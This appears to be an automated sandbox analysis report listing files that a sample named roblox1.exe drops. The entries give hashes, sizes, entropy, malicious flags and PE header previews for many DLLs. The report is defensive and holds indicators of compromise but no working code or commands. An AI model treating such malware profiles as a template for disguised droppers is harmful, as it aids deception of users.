File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):64424
                                                                                                                                                                                                                                  Entropy (8bit):6.124000794465739
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:r/p7Wh7XUagO7BR4SjavFHx8pIS5nWQ7Sy7o:r/tWhzUahBR4Sjahx8pIS5n5Fo
                                                                                                                                                                                                                                  MD5:6EB3C9FC8C216CEA8981B12FD41FBDCD
                                                                                                                                                                                                                                  SHA1:5F3787051F20514BB9E34F9D537D78C06E7A43E6
                                                                                                                                                                                                                                  SHA-256:3B0661EF2264D6566368B677C732BA062AC4688EF40C22476992A0F9536B0010
                                                                                                                                                                                                                                  SHA-512:2027707824D0948673443DD54B4F45BC44680C05C3C4A193C7C1803A1030124AD6C8FBE685CC7AAF15668D90C4CD9BFB93DE51EA8DB4AF5ABE742C1EF2DCD08B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: roblox.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: random.exe.6.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: end.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Win64.Malware-gen.19901.26035.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.PWS.Stealer.39881.9434.15338.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.~[b...b...b...k..`.......`.......n.......j.......a.......a.......`...b..........c.......c.......c.......c...Richb...........PE..d....K.b.........." ... .T..........`...............................................^.....`.............................................P...P...d........................)...........w..T...........................@v..@............p.. ............................text....R.......T.................. ..`.rdata...I...p...J...X..............@..@.data...(...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):83368
                                                                                                                                                                                                                                  Entropy (8bit):6.530099411242372
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:asRz7qNFcaO6ViD4fhaLRFc/a8kd7jzWHCxIStVs7Sywk:9RzGYYhaY9kd7jzWixIStVs+k
                                                                                                                                                                                                                                  MD5:A4B636201605067B676CC43784AE5570
                                                                                                                                                                                                                                  SHA1:E9F49D0FC75F25743D04CE23C496EB5F89E72A9A
                                                                                                                                                                                                                                  SHA-256:F178E29921C04FB68CC08B1E5D1181E5DF8CE1DE38A968778E27990F4A69973C
                                                                                                                                                                                                                                  SHA-512:02096BC36C7A9ECFA1712FE738B5EF8B78C6964E0E363136166657C153727B870A6A44C1E1EC9B81289D1AA0AF9C85F1A37B95B667103EDC2D3916280B6A9488
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........{..{..{...#.{......{....M.{......{......{......{......{..Z...{..{...{......{......{....O.{......{..Rich.{..........PE..d....K.b.........." ... .....^..............................................P......& ....`.........................................p...H............0....... .. ........)...@..........T...........................p...@............................................text...O........................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):178176
                                                                                                                                                                                                                                  Entropy (8bit):6.160618368535074
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:a28mc0wlApJaPh2dEVWkS0EDejc2zSTBcS7EkSTLkKDtJbtb:axTlApohBV1S0usWchkSTLLDDt
                                                                                                                                                                                                                                  MD5:2BAAA98B744915339AE6C016B17C3763
                                                                                                                                                                                                                                  SHA1:483C11673B73698F20CA2FF0748628C789B4DC68
                                                                                                                                                                                                                                  SHA-256:4F1CE205C2BE986C9D38B951B6BCB6045EB363E06DACC069A41941F80BE9068C
                                                                                                                                                                                                                                  SHA-512:2AE8DF6E764C0813A4C9F7AC5A08E045B44DAAC551E8FF5F8AA83286BE96AA0714D373B8D58E6D3AA4B821786A919505B74F118013D9FCD1EBC5A9E4876C2B5F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p...p...p.y.q...p.y{p...p.y.q...p.y.q...p.y.q...p.q...pi..q...p...pX..p.x.q...p...p...p.x.q...p.xyp...p.x.q...pRich...p................PE..d......f.........." ...).....B.............................................. ............`.........................................PX..l....X.......................................?...............................=..@............................................text............................... ..`.rdata..............................@..@.data....].......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):122792
                                                                                                                                                                                                                                  Entropy (8bit):6.021506515932983
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:bsQx9bm+edYe3ehG+20t7MqfrSW08UficVISQPkFPR:QQxCOhGB0tgqfrSiUficrZ
                                                                                                                                                                                                                                  MD5:87596DB63925DBFE4D5F0F36394D7AB0
                                                                                                                                                                                                                                  SHA1:AD1DD48BBC078FE0A2354C28CB33F92A7E64907E
                                                                                                                                                                                                                                  SHA-256:92D7954D9099762D81C1AE2836C11B6BA58C1883FDE8EEEFE387CC93F2F6AFB4
                                                                                                                                                                                                                                  SHA-512:E6D63E6FE1C3BD79F1E39CB09B6F56589F0EE80FD4F4638002FE026752BFA65457982ADBEF13150FA2F36E68771262D9378971023E07A75D710026ED37E83D7B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T....ne..ne..ne......ne.p.d..ne.p.`..ne.p.a..ne.p.f..ne.t.d..ne...a..ne...d..ne...d..ne..nd..ne.t.h..ne.t.e..ne.t....ne.t.g..ne.Rich.ne.........PE..d....K.b.........." ... ............P[..............................................H.....`..........................................Q.......R...........................).......... ...T...............................@...............@............................text............................... ..`.rdata..nl.......n..................@..@.data...D>...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):250280
                                                                                                                                                                                                                                  Entropy (8bit):6.547354352688139
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:TogRj7JKM8c7N6FiFUGMKa3xB6Dhj9qWMa3pLW1A64WsqC:tPJKa7N6FEa3x4NlbqC
                                                                                                                                                                                                                                  MD5:10F7B96C666F332EC512EDADE873EECB
                                                                                                                                                                                                                                  SHA1:4F511C030D4517552979105A8BB8CCCF3A56FCEA
                                                                                                                                                                                                                                  SHA-256:6314C99A3EFA15307E7BDBE18C0B49BC841C734F42923A0B44AAB42ED7D4A62D
                                                                                                                                                                                                                                  SHA-512:CFE5538E3BECBC3AA5540C627AF7BF13AD8F5C160B581A304D1510E0CB2876D49801DF76916DCDA6B7E0654CE145BB66D6E31BD6174524AE681D5F2B49088419
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................7.......................................+.........c.........................[...........Rich...........PE..d....K.b.........." ... .p...:.......................................................^....`..........................................D..P...@E...................'.......)......@...p...T...........................0...@............................................text...]o.......p.................. ..`.rdata...............t..............@..@.data....)...`...$...L..............@....pdata...'.......(...p..............@..@.rsrc...............................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):61864
                                                                                                                                                                                                                                  Entropy (8bit):6.210920109899827
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:aSz5iGzcowlJF+aSe3kuKUZgL4dqDswE9+B1fpIS5IHYiSyvc9eEdB:npWlJF+aYupZbdqDOgB1fpIS5IH7Sy+V
                                                                                                                                                                                                                                  MD5:49CE7A28E1C0EB65A9A583A6BA44FA3B
                                                                                                                                                                                                                                  SHA1:DCFBEE380E7D6C88128A807F381A831B6A752F10
                                                                                                                                                                                                                                  SHA-256:1BE5CFD06A782B2AE8E4629D9D035CBC487074E8F63B9773C85E317BE29C0430
                                                                                                                                                                                                                                  SHA-512:CF1F96D6D61ECB2997BB541E9EDA7082EF4A445D3DD411CE6FD71B0DFE672F4DFADDF36AE0FB7D5F6D1345FBD90C19961A8F35328332CDAA232F322C0BF9A1F9
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zD.A>%..>%..>%..7]..:%..^_..<%..^_..2%..^_..6%..^_..=%..Z_..<%...W..<%...\..=%..>%...%..Z_..?%..Z_..?%..Z_..?%..Z_..?%..Rich>%..................PE..d....K.b.........." ... .P...z.......<..............................................Np....`............................................P...@............................)......X....l..T............................k..@............`..(............................text....N.......P.................. ..`.rdata..VM...`...N...T..............@..@.data...8...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):158120
                                                                                                                                                                                                                                  Entropy (8bit):6.838169661977938
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:MeORg8tdLRrHn5Xp4znfI9mNoY6JCvyPZxsyTxISe1KmDd:M/Rgo1L5wwYOY6MixJKR
                                                                                                                                                                                                                                  MD5:B5FBC034AD7C70A2AD1EB34D08B36CF8
                                                                                                                                                                                                                                  SHA1:4EFE3F21BE36095673D949CCEAC928E11522B29C
                                                                                                                                                                                                                                  SHA-256:80A6EBE46F43FFA93BBDBFC83E67D6F44A44055DE1439B06E4DD2983CB243DF6
                                                                                                                                                                                                                                  SHA-512:E7185DA748502B645030C96D3345D75814BA5FD95A997C2D1C923D981C44D5B90DB64FAF77DDBBDC805769AF1BEC37DAF0ECEE0930A248B67A1C2D92B59C250C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m....................................................<.........................................Rich...........................PE..d....L.b.........." ... .d...........8...............................................p....`.........................................0%..L...|%..x....p.......P.......@...)......H.......T...........................`...@............................................text...^c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..H............>..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):33192
                                                                                                                                                                                                                                  Entropy (8bit):6.3186201273933635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Y3I65wgJ5xeSZg2edRnJ8ZISRtczYiSyvZCeEdP:gIgJ5Uqg2edRJ8ZISRtcz7Sy0b
                                                                                                                                                                                                                                  MD5:71AC323C9F6E8A174F1B308B8C036E88
                                                                                                                                                                                                                                  SHA1:0521DF96B0D622544638C1903D32B1AFF1F186B0
                                                                                                                                                                                                                                  SHA-256:BE8269C83666EAA342788E62085A3DB28F81512D2CFA6156BF137B13EBEBE9E0
                                                                                                                                                                                                                                  SHA-512:014D73846F06E9608525A4B737B7FCCBE2123D0E8EB17301244B9C1829498328F7BC839CC45A1563CF066668EA6E0C4E3A5A0821AB05C999A97C20AA669E9EDA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_.+.>.x.>.x.>.x.Fgx.>.x.D.y.>.x.D.y.>.x.D.y.>.x.D.y.>.x.D.y.>.x.>.x.>.xmL.y.>.x.D.y.>.x.D.y.>.x.D.x.>.x.D.y.>.xRich.>.x........................PE..d....K.b.........." ... .....<......0....................................................`.........................................0D..`....D..x....p.......`.......X...)...........4..T...........................p3..@............0...............................text............................... ..`.rdata..^....0... ..."..............@..@.data........P.......B..............@....pdata.......`.......H..............@..@.rsrc........p.......L..............@..@.reloc...............V..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):48552
                                                                                                                                                                                                                                  Entropy (8bit):6.319402195167259
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:9i4KJKYCKlBj7gKxwfZQ7ZlYXF1SVMHE4ftISstDYiSyvM+eEd2:hKJfBuAA1SVWBftISstD7Syti
                                                                                                                                                                                                                                  MD5:7E6BD435C918E7C34336C7434404EEDF
                                                                                                                                                                                                                                  SHA1:F3A749AD1D7513EC41066AB143F97FA4D07559E1
                                                                                                                                                                                                                                  SHA-256:0606A0C5C4AB46C4A25DED5A2772E672016CAC574503681841800F9059AF21C4
                                                                                                                                                                                                                                  SHA-512:C8BF4B1EC6C8FA09C299A8418EE38CDCCB04AFA3A3C2E6D92625DBC2DE41F81DD0DF200FD37FCC41909C2851AC5CA936AF632307115B9AC31EC020D9ED63F157
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|.K{8.%(8.%(8.%(1..(<.%(X.$):.%(X. )4.%(X.!)0.%(X.&);.%(\.$):.%(8.$(N.%(.$)=.%(.!)9.%(\.()9.%(\.%)9.%(\..(9.%(\.')9.%(Rich8.%(........PE..d....K.b.........." ... .>...X...... ................................................o....`..........................................w..X...(x...........................)...... ....V..T............................U..@............P...............................text....<.......>.................. ..`.rdata...4...P...6...B..............@..@.data................x..............@....pdata..............................@..@.rsrc...............................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30632
                                                                                                                                                                                                                                  Entropy (8bit):6.41055734058478
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:lez/Dt36r34krA4eVIS7UAYiSyvAEYeEdSiD:leDE34krA4eVIS7UA7Sy9YLD
                                                                                                                                                                                                                                  MD5:23F4BECF6A1DF36AEE468BB0949AC2BC
                                                                                                                                                                                                                                  SHA1:A0E027D79A281981F97343F2D0E7322B9FE9B441
                                                                                                                                                                                                                                  SHA-256:09C5FAF270FD63BDE6C45CC53B05160262C7CA47D4C37825ED3E15D479DAEE66
                                                                                                                                                                                                                                  SHA-512:3EE5B3B7583BE1408C0E1E1C885512445A7E47A69FF874508E8F0A00A66A40A0E828CE33E6F30DDC3AC518D69E4BB96C8B36011FB4EDEDF9A9630EF98A14893B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......&.~Zb...b...b...k..`.......`.......n.......j.......a.......a.......`...b...+.......c.......c.......c.......c...Richb...........................PE..d....K.b.........." ... .....8.......................................................F....`..........................................C..L....C..d....p.......`.......N...)..........`4..T........................... 3..@............0..(............................text............................... ..`.rdata..2....0......................@..@.data...x....P.......:..............@....pdata.......`.......>..............@..@.rsrc........p.......B..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\roblox1.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):77736
                                                                                                                                                                                                                                  Entropy (8bit):6.247935524153974
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:C6DucXZAuj19/s+S+pjtk/DDTaVISQwn7SyML:C6DPXSuj19/sT+ppk/XWVISQwneL
                                                                                                                                                                                                                                  MD5:E137DF498C120D6AC64EA1281BCAB600
                                                                                                                                                                                                                                  SHA1:B515E09868E9023D43991A05C113B2B662183CFE
                                                                                                                                                                                                                                  SHA-256:8046BF64E463D5AA38D13525891156131CF997C2E6CDF47527BC352F00F5C90A
                                                                                                                                                                                                                                  SHA-512:CC2772D282B81873AA7C5CBA5939D232CCEB6BE0908B211EDB18C25A17CBDB5072F102C0D6B7BC9B6B2F1F787B56AB1BC9BE731BB9E98885C17E26A09C2BEB90
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...ry..ry..ry..{.g.ty......py.......y......zy......qy......py..ry...y......uy......sy......sy......sy......sy..Richry..................PE..d....K.b.........." ... .l.......... &.......................................P.......Q....`.............................................P...P........0....... ..l........)...@.........T...............................@............................................text...Rj.......l.................. ..`.rdata...s.......t...p..............@..@.data...............................@....pdata..l.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):97704
Entropy (8bit):6.173518585387285
Encrypted:false
SSDEEP:1536:GzgMWYDOavuvwYXGqijQaIrlIaiP9NbTp9c4L7ZJkyDpIS5Qux7Syce:NFYqDPSQaIrlI/DbLc2tJkyDpIS5QuxZ
MD5:7F61EACBBBA2ECF6BF4ACF498FA52CE1
SHA1:3174913F971D031929C310B5E51872597D613606
SHA-256:85DE6D0B08B5CC1F2C3225C07338C76E1CAB43B4DE66619824F7B06CB2284C9E
SHA-512:A5F6F830C7A5FADC3349B42DB0F3DA1FDDB160D7E488EA175BF9BE4732A18E277D2978720C0E294107526561A7011FADAB992C555D93E77D4411528E7C4E695A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):159144
Entropy (8bit):6.002098953253968
Encrypted:false
SSDEEP:3072:UhIDGtzShE3z/JHPUE0uev5J2oE/wu3rE923+nuI5Piev9muxISt710Y:UhIqtzShE3zhvyue5EMnuaF9mu3
MD5:35F66AD429CD636BCAD858238C596828
SHA1:AD4534A266F77A9CDCE7B97818531CE20364CB65
SHA-256:58B772B53BFE898513C0EB264AE4FA47ED3D8F256BC8F70202356D20F9ECB6DC
SHA-512:1CCA8E6C3A21A8B05CC7518BD62C4E3F57937910F2A310E00F13F60F6A94728EF2004A2F4A3D133755139C3A45B252E6DB76987B6B78BC8269A21AD5890356AD
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):23976
Entropy (8bit):6.5352541220575695
Encrypted:false
SSDEEP:384:I3AVpEWz6TPQxISewl4IYiSy1pCQXdW4i/8E9VFL2Utah:ISpENTQxISewLYiSyvNWeEdy
MD5:13AA3AF9AED86CC917177AE1F41ACC9B
SHA1:F5D95679AFDA44A6689DBB45E93EBE0E9CD33D69
SHA-256:51DD1EA5E8CACF7EC4CADEFDF685334C7725FF85978390D0B3D67FC8C54FE1DB
SHA-512:E1F5DBD6C0AFCF207DE0100CBA6F1344FEB0006A5C12DC92768AB2D24E3312F0852F3CD31A416AAFEB0471CD13A6C0408F0DA62956F7870B2E22D174A8B23C45
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):54784
Entropy (8bit):5.723071280644947
Encrypted:false
SSDEEP:768:DTcl94C2NHW3W3MvYrglsf9pbjfYSLBJrIBhGyoCOpq7+xBNnQfQ0uwu:Hcl9sUmMVodbJkPhox5UQ0uB
MD5:BF489369F5E8A61CCA71E29009DC5D95
SHA1:54299F6521B9C397F8969CA92404F492CF572AF6
SHA-256:652364BEA64C5CB50B81CA43A09418E75FD374FFD374DBAA193F4EBB3F9F36BD
SHA-512:C34E607DAF025F6ECC6B8C5118468F4B1EFD82B373C1EA382BB57C33D45845DD28B62111425DDBA637C9C91DF111B1936A950D19BE872F8716FF04B5CF91BDB9
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):265216
Entropy (8bit):6.169190575012905
Encrypted:false
SSDEEP:3072:6VuE3wfVay+yG9N5EcV5E5V0HV5ffOxnGNp6P2eUm6PIZoHhbjI5l:qV3wfVUv5Eq5ffXKP2RgUbj2
MD5:CFCEB0CC2F7BFE5F8E33061EB40662ED
SHA1:8D27CFA4BF1E32C5EF17BBA4AF1815AB0523A13B
SHA-256:489521FC6B3DE3ABD2F9F3C17DFC42919E44B53453EA439B30240A986152B07C
SHA-512:377E3F3BDB89B486D76860D6BC66D0741F29035105F74CC9CCBF34842F5DA1E7855D9A9531B8AAAD482E708AE49BFBE012E857BF72CED2975AEB4D6B64528918
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):49152
Entropy (8bit):5.733157245866308
Encrypted:false
SSDEEP:768:dFd3TU4fyPems4AhK4n+e5RtoyTyc6Ko2gs5lhpWuFPbPHDPY/Sq8lWi/m7:djTUOF1g4+er2y2HKdgsf/lHjsS7lWi
MD5:60A5DF89F9F9812619FC145B497D7EF0
SHA1:A52F234C1C20CA75E58CEFDDAFF82AA3AD1FE758
SHA-256:C4F748A1BA5AFF15719358C8C98A4B3D58E9A54B0B3FE56A371ECDEFA566278F
SHA-512:C188BCF9C617B2C1FA333B1F71342C75DA0248898D7F2BA98B887EC46EA750C04CC3EF4DF82860BC69D59FA8A746736B598F37DF8650FF3727D6342B09309974
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):36864
Entropy (8bit):5.5970447917528094
Encrypted:false
SSDEEP:768:YrQDXgJinHx+wr47jrqJUfuk3HI6cX27T/U2HCWWwGeq:ISvHx9s7jus3H9LH5WwGe
MD5:1D2338EFB662095C61A31B36C7FF9A0D
SHA1:DEAEEF56D21CBDF5FED321C4574490334F4453EF
SHA-256:6C092641F8C45B0187A3B5133720AE1BDA215E1E92A9E094AB37DAB4AA7F6642
SHA-512:ACFD558B8CC48ED6356EA20FEAD7D87B402E67955AC1A9B8C3F8C688284376622E30297323CCCEB5A1E81F5F2443B8F6D3A0587B29D46B8CDF9AD666121C9B7E
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Users\user\Desktop\roblox1.exe
File Type:ASCII text
Category:dropped
Size (bytes):299427
Entropy (8bit):6.047872935262006
Encrypted:false
SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
MD5:50EA156B773E8803F6C1FE712F746CBA
SHA1:2C68212E96605210EDDF740291862BDF59398AEF
SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
Malicious:false
Process:C:\Users\user\Desktop\roblox1.exe
File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):7900672
Entropy (8bit):6.519460416205842
Encrypted:false
